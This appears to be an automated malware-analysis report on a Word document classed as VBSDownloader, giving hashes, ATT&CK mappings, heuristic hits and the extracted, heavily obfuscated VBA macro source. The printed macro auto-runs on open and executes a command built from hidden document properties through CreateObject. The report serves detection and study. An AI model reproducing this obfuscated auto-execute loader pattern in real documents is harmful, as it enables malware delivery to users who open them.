VBSDownloader — Office (OLE) malware analysis

Static analysis result for SHA-256 31e3fc47f0846cce…

MALICIOUS

Office (OLE)

76.5 KB Created: 2017-08-23 10:15:00 Authoring application: Microsoft Office Word First seen: 2017-09-14
MD5: 90f93a037983ecfbd69c6706931dc530 SHA-1: 4b797f845d8217a248b8571486fb4377b03501d1 SHA-256: 31e3fc47f0846cce98cedf0a6a8c1a8224b3350c26254982cc9786ec5c9982bc
192 Risk Score

Malware Insights

VBSDownloader · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an auto-executing macro ('autoopen') that uses 'CreateObject' to likely download and execute a second-stage payload, as suggested by the ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0'. The VBA macro itself is heavily obfuscated, but its structure and the heuristic firings strongly suggest a downloader functionality.

Heuristics 8

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     hCmKFBfWmE = "yCwPaXvdBkA"
     CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
    MEembHVxzx = "rupHwEnskFY"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
    SEWfmEPmHBD
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10086 bytes
SHA-256: 958723df6a095070f80dc4d850123fa3f28636883d8934287e3d6ce8c8eb2780
Detection
ClamAV: No threats found
Obfuscation or payload: likely
235 of 275 identifiers look randomly generated (e.g. 'UMKDLgDUKvd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function UuWGcCKmm()
Dim kSdCGKtvftA()
TPZkbBcCd = 7693
ReDim kSdCGKtvftA(7693)
kSdCGKtvftA(4023) = YMgAfUPC
 kSdCGKtvftA(6846) = tskVCYKZ
 kSdCGKtvftA(4329) = 432
 kSdCGKtvftA(3548) = 5597
 kSdCGKtvftA(4625) = 5448
 kSdCGKtvftA(2176) = 4280
 For TPZkbBcCd = 3514 To 3656
kSdCGKtvftA(TPZkbBcCd) = TPZkbBcCd
Next
End Function
 
Function nnfGeycE()
Dim wHvWLyCCL()
DnExBHxRyfp = 8655
ReDim wHvWLyCCL(8655)
wHvWLyCCL(3795) = PzCMcVcgnh
 wHvWLyCCL(7209) = xztUgbFWDCL
 wHvWLyCCL(6882) = TRNmmsArVhW
 wHvWLyCCL(2806) = pbBHkrSdTMe
 wHvWLyCCL(2583) = 7295
 wHvWLyCCL(1945) = 5468
 wHvWLyCCL(738) = 9279
 wHvWLyCCL(4941) = 7633
 wHvWLyCCL(1137) = 3166
 wHvWLyCCL(1210) = 5447
 For DnExBHxRyfp = 5741 To 261
wHvWLyCCL(DnExBHxRyfp) = DnExBHxRyfp
Next
End Function
 
Function RZYYtdsM()
Dim LeHYbnYspZ()
sgNrVGUwG = 7163
ReDim LeHYbnYspZ(7163)
LeHYbnYspZ(6409) = SVvmkMBg
 LeHYbnYspZ(2948) = RdmThCHmTL
 LeHYbnYspZ(2082) = LdWNekGrLw
 LeHYbnYspZ(6783) = LsMsgBGyRb
 LeHYbnYspZ(7054) = WTFzMExVy
 LeHYbnYspZ(6152) = gsafKsLKTYr
 LeHYbnYspZ(5268) = 3291
 LeHYbnYspZ(346) = 278
 LeHYbnYspZ(487) = 6849
 For sgNrVGUwG = 6927 To 5687
LeHYbnYspZ(sgNrVGUwG) = sgNrVGUwG
Next
End Function
 
Function hZsSvuuLN()
Dim WbvUBcPhR()
DfVfApYTMpS = 5773
ReDim WbvUBcPhR(5773)
WbvUBcPhR(4737) = aeCevfdRve
 WbvUBcPhR(5411) = wsyYvTeT
 WbvUBcPhR(5427) = wpXgmMULn
 WbvUBcPhR(3091) = 384
 WbvUBcPhR(1600) = 9103
 WbvUBcPhR(2853) = 9593
 For DfVfApYTMpS = 3128 To 410
WbvUBcPhR(DfVfApYTMpS) = DfVfApYTMpS
Next
End Function
 
Function HeeUEhda()
Dim SkCRBzTNKkZ()
rGPpRNaR = 6882
ReDim SkCRBzTNKkZ(6882)
SkCRBzTNKkZ(1649) = fvtEMUAruuY
 SkCRBzTNKkZ(1977) = gSSheHkUPD
 SkCRBzTNKkZ(3057) = RHmhhTzWPKr
 SkCRBzTNKkZ(1459) = 8296
 SkCRBzTNKkZ(2652) = 1995
 For rGPpRNaR = 3667 To 1519
SkCRBzTNKkZ(rGPpRNaR) = rGPpRNaR
Next
End Function
 
Function bsEWmzMcdBe()
Dim CvXcKFfE()
xZARnFmnKK = 9349
ReDim CvXcKFfE(9349)
CvXcKFfE(1894) = tzheUEHKB
 CvXcKFfE(9226) = eEFPAmvs
 CvXcKFfE(7353) = fyTuKpgs
 CvXcKFfE(1583) = APhvZMFa
 CvXcKFfE(3344) = hSxwwPdFEMr
 CvXcKFfE(4620) = 4269
 CvXcKFfE(6711) = 8144
 CvXcKFfE(6355) = 4741
 CvXcKFfE(6902) = 5694
 CvXcKFfE(5980) = 167
 CvXcKFfE(5369) = 6975
 For xZARnFmnKK = 9298 To 1013
CvXcKFfE(xZARnFmnKK) = xZARnFmnKK
Next
End Function
 
Function zNpvdYtuxWc()
Dim pNDdndaTme()
uKtRmAEVPeB = 665
ReDim pNDdndaTme(665)
pNDdndaTme(109) = KtxVVDXX
 pNDdndaTme(222) = LrLKszrX
 pNDdndaTme(582) = PzGLGcxAa
 pNDdndaTme(458) = PWenwNyU
 pNDdndaTme(280) = 5113
 pNDdndaTme(193) = 8710
 pNDdndaTme(630) = 7182
 pNDdndaTme(605) = 6362
 pNDdndaTme(587) = 4716
 pNDdndaTme(227) = 7107
 For uKtRmAEVPeB = 561 To 174
pNDdndaTme(uKtRmAEVPeB) = uKtRmAEVPeB
Next
End Function
 
Function vcvVFmHrhmB()
Dim nVbNtczP()
mhDyWwhahX = 6402
ReDim nVbNtczP(6402)
nVbNtczP(4696) = CkzygCgDzZb
 nVbNtczP(1875) = zWKnYBByaWs
 nVbNtczP(1550) = kLTBAXEWszx
 nVbNtczP(5133) = 7583
 nVbNtczP(5891) = 8940
 nVbNtczP(4413) = 2627
 nVbNtczP(6249) = 3938
 nVbNtczP(2793) = 9756
 For mhDyWwhahX = 2505 To 5149
nVbNtczP(mhDyWwhahX) = mhDyWwhahX
Next
End Function
 
Function eGWaDsAyChp()
Dim hzZYGBpHP()
NMWcebCs = 4857
ReDim hzZYGBpHP(4857)
hzZYGBpHP(2256) = VsXBYryVaSF
 hzZYGBpHP(2623) = fzLswewUWF
 hzZYGBpHP(3235) = AtWvtbUkWxf
 hzZYGBpHP(1792) = yvVETnsctaW
 hzZYGBpHP(1580) = nMwxXYRxB
 hzZYGBpHP(2536) = 3693
 hzZYGBpHP(102) = 5824
 hzZYGBpHP(2209) = 4767
 hzZYGBpHP(3984) = 1537
 hzZYGBpHP(2028) = 2006
 hzZYGBpHP(3499) = 5860
 For NMWcebCs = 4007 To 2149
hzZYGBpHP(NMWcebCs) = NMWcebCs
Next
End Function

Sub autoopen()
SEWfmEPmHBD
End Sub
Public Function GGeYpdzkeM(fBdFXvMtWT)
hTZSUBMTAp = "sGsbdLrufp"
 etpVGVum = "mETgKbgsHUe"
 RbuVtvzvn = "bHHAUnMrXF"
 sGLckvMGP = "rBVUkYByC"
 wtfFFppf = "uFveWEEEaY"
 epuRGHUUy = "XrtpPEBA"
 BEptVXeVF = "WmWccFVD"
 RFWVXGGk = "WuAcsYwfLk"
 GGeYpdzkeM = ActiveDocument.CustomDocumentProperties(fBdFXvMtWT) + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + fAFfTtLxGWk
pGbUGMfsW = "GsGLRHSZF"
 aFghZswaEER = "GmCnPwLCyeX"
 pTbhZFbtdk = "FYCKbrgUkR"
 wrTCDkNVL = "ksPMFZzVSv"
 ddsGyCeGCy = "gmTYWTbcK"
 VrcpSuxkS = "RzGpHkrdTvW"
 EVvySgLv = "YMzaDpeArN"
 WNzYVGXkpb = "MTrKbHsu"
 End Function
Public Function yWfzXCLRL()
mKVetctGMYn = "yrKYdwEpzf"
 wsPdXayTZRw = "TDDgmTTyRx"
 bDPkHxMmhZ = "uMcTbpnk"
 NYDBXAXVeyM = "TESuhLABY"
 mPhwykaRdnT = GGeYpdzkeM("pVesNMDD") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + GGeYpdzkeM("dNWBxeLpvh") + GGeYpdzkeM("CpGEXgyr") + GGeYpdzkeM("aLVULngBk")
sFnZRZPcH = "PDbZUMVXHt"
 EASVYTff = "LwZMCcPwzKr"
 pGNgeMpZKDC = "pfVfhKYYar"
 wVutHFFGf = "MGeCRRmVY"
 vUHWEKHTFgR = "dYXSfeKPyhP"

bBWBsxvZC = GGeYpdzkeM("wFvScDNrcD") + GGeYpdzkeM("NYYUbSvw") + GGeYpdzkeM("HmgKxtsXwWn") + GGeYpdzkeM("rxNWFLuZNW") + GGeYpdzkeM("fLgpEEPySWS")
zCxWFrktb = bBWBsxvZC + mPhwykaRdnT
SUYXaKFEUuW = "MSTnMrBu"
 kKZgRMfZfU = "hWYzZzxYG"
 EAfvZZTzZZc = "RfevhmkpG"
 kDXxBakP = "FMAfwvcMZ"
 bypkzXrdVG = "kyKpzZuu"
 cxKFcMZBw = "bkzKKuWegtf"
 swBKwKeaG = "bDkeumaG"
 yWfzXCLRL = zCxWFrktb + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function DGVuXEDvC()
DGVuXEDvC = GGeYpdzkeM("yNNaEaEaNwC") + GGeYpdzkeM("WkZhErcT") + GGeYpdzkeM("eXnFgAWpc") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + LFCMtdME
ybtCwxsYME = "dwvYYCNkwH"
 VPtAHYYE = "eDukLMCZ"
 HLnDkgEB = "LKWRytBKLr"
 gHubZGfS = "SRaEWtypnc"
 KETmkAzVKG = "NhSeLKsVgb"
 rWxTmwpdyxY = "UMKDLgDUKvd"
 GtnsxVnwwWz = "myrkrBZyf"
 nxewRZDYvc = "LNzEbhvez"
 End Function
Public Function SEWfmEPmHBD()
GfutSEbC = "WLAgFBWXS"
 hCmKFBfWmE = "yCwPaXvdBkA"
 CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
MEembHVxzx = "rupHwEnskFY"
 KpeGBCCgUK = "nMRgtsuC"
 XgyNuUwXDHc = "DEmanafDgp"
 wmGykMxYtaX = "GfbhYMeU"
 kDVzduac = "GrByEmpbpck"
 nbYSaWpPm = "XAPTCMSeYA"
 bnfHpKELGK = "RxnUsradM"
 GpZFzNEbX = "NDVYKYmLzgM"
 End Function

Function EkWGTpmUsXR()
Dim XgvwtwGkp()
GhfLaHkTgus = 3246
ReDim XgvwtwGkp(3246)
XgvwtwGkp(2395) = UNEspXYY
 XgvwtwGkp(654) = UpCTgvecf
 XgvwtwGkp(2967) = WRmrtbDs
 XgvwtwGkp(1343) = nSruxddRGPx
 XgvwtwGkp(273) = vCLPuXNp
 XgvwtwGkp(1449) = 7419
 XgvwtwGkp(3080) = 2346
 XgvwtwGkp(1852) = 8347
 XgvwtwGkp(2841) = 3943
 XgvwtwGkp(1911) = 7688
 XgvwtwGkp(3036) = 1371
 For GhfLaHkTgus = 2645 To 214
XgvwtwGkp(GhfLaHkTgus) = GhfLaHkTgus
Next
End Function
 
Function hdXSENYcU()
Dim zKwScAKM()
LTGugrSXf = 8982
ReDim zKwScAKM(8982)
zKwScAKM(4706) = FAnLpFWpCLC
 zKwScAKM(4294) = wPwvHEEZpV
 zKwScAKM(8189) = ZWwRgvAExG
 zKwScAKM(1571) = GAtpWWVc
 zKwScAKM(8382) = 8495
 zKwScAKM(6757) = 7115
 For LTGugrSXf = 3055 To 8866
zKwScAKM(LTGugrSXf) = LTGugrSXf
Next
End Function
 
Function ZztYaWcC()
Dim WUVbNddg()
BtFmVMSZwLm = 9622
ReDim WUVbNddg(9622)
WUVbNddg(7816) = eKxWATFh
 WUVbNddg(6799) = ZKHVsvvP
 WUVbNddg(270) = 6448
 WUVbNddg(7474) = 1367
 For BtFmVMSZwLm = 4073 To 6257
WUVbNddg(BtFmVMSZwLm) = BtFmVMSZwLm
Next
End Function
 
Function XrcPySkKE()
Dim CPhcUGXuTZx()
vNVdMHTYbY = 7775
ReDim CPhcUGXuTZx(7775)
CPhcUGXuTZx(1299) = HKzBzRLn
 CPhcUGXuTZx(3827) = bpgvSXXW
 CPhcUGXuTZx(671) = cWBPpkcDSyt
 CPhcUGXuTZx(3438) = hfvVwdNuHN
 CPhcUGXuTZx(7210) = hemPwEdRd
 CPhcUGXuTZx(1480) = 4486
 CPhcUGXuTZx(3056) = 9935
 CPhcUGXuTZx(4716) = 2964
 CPhcUGXuTZx(2311) = 6556
 CPhcUGXuTZx(4191) = 6614
 CPhcUGXuTZx(1281) = 5481
 For vNVdMHTYbY = 586 To 7250
CPhcUGXuTZx(vNVdMHTYbY) = vNVdMHTYbY
Next
End Function
 
Function FAfkgkZX()
Dim GLvUdNmBx()
tvagCGmBbhW = 2152
ReDim GLvUdNmBx(2152)
GLvUdNmBx(1217) = nHKzetXvs
 GLvUdNmBx(1669) = gASccAAAkbX
 GLvUdNmBx(2083) = CCdnLLVDt
 GLvUdNmBx(511) = ncpkGKnk
 GLvUdNmBx(1751) = PGWVuLAMC
 GLvUdNmBx(1432) = BfSzSfSSns
 GLvUdNmBx(2141) = 8278
 GLvUdNmBx(528) = 7989
 GLvUdNmBx(2083) = 3819
 GLvUdNmBx(75) = 2190
 GLvUdNmBx(910) = 1218
 For tvagCGmBbhW = 1608 To 230
GLvUdNmBx(tvagCGmBbhW) = tvagCGmBbhW
Next
End Function
 
Function nbXrebyaC()
Dim sAebgYCbs()
XVFzPNRuCa = 2298
ReDim sAebgYCbs(2298)
sAebgYCbs(2159) = FUtamvXSFW
 sAebgYCbs(1080) = LakeNvfEw
 sAebgYCbs(255) = MXxUTAkSSF
 sAebgYCbs(1978) = yMStUdAX
 sAebgYCbs(193) = rmKrzgMszu
 sAebgYCbs(1477) = 7362
 sAebgYCbs(1983) = 985
 sAebgYCbs(1896) = 2666
 sAebgYCbs(873) = 3357
 sAebgYCbs(1198) = 2412
 For XVFzPNRuCa = 584 To 2101
sAebgYCbs(XVFzPNRuCa) = XVFzPNRuCa
Next
End Function
 
Function sKekEVXvLv()
Dim adrcTyWDU()
bfnDemYRp = 8138
ReDim adrcTyWDU(8138)
adrcTyWDU(2610) = mLapvgwVs
 adrcTyWDU(4920) = fuPVrdUybX
 adrcTyWDU(574) = WyzRKZTy
 adrcTyWDU(6078) = wLwAaNCarF
 adrcTyWDU(3191) = 6052
 adrcTyWDU(992) = 192
 adrcTyWDU(3840) = 9929
 adrcTyWDU(5318) = 7084
 adrcTyWDU(2567) = 9669
 For bfnDemYRp = 6497 To 6377
adrcTyWDU(bfnDemYRp) = bfnDemYRp
Next
End Function
 
Function TDgzytVCRA()
Dim HVUAKyLg()
rhfZYSgHd = 3128
ReDim HVUAKyLg(3128)
HVUAKyLg(605) = HvnehNHWMAu
 HVUAKyLg(2491) = fCeBpDURfba
 HVUAKyLg(558) = 2588
 HVUAKyLg(1699) = 1794
 HVUAKyLg(692) = 9464
 For rhfZYSgHd = 2836 To 1514
HVUAKyLg(rhfZYSgHd) = rhfZYSgHd
Next
End Function
 
Function nbsVuhDwLPy()
Dim HEWPwSKcEDh()
wBdwXuvMC = 8919
ReDim HEWPwSKcEDh(8919)
HEWPwSKcEDh(6895) = XVdgbXgEp
 HEWPwSKcEDh(918) = HBXNZWbprd
 HEWPwSKcEDh(4160) = vMxnynby
 HEWPwSKcEDh(2434) = fNEaCnLrvw
 HEWPwSKcEDh(5411) = 7538
 HEWPwSKcEDh(512) = 8408
 HEWPwSKcEDh(2106) = 2488
 HEWPwSKcEDh(692) = 1794
 HEWPwSKcEDh(7110) = 4916
 HEWPwSKcEDh(573) = 4534
 For wBdwXuvMC = 383 To 899
HEWPwSKcEDh(wBdwXuvMC) = wBdwXuvMC
Next
End Function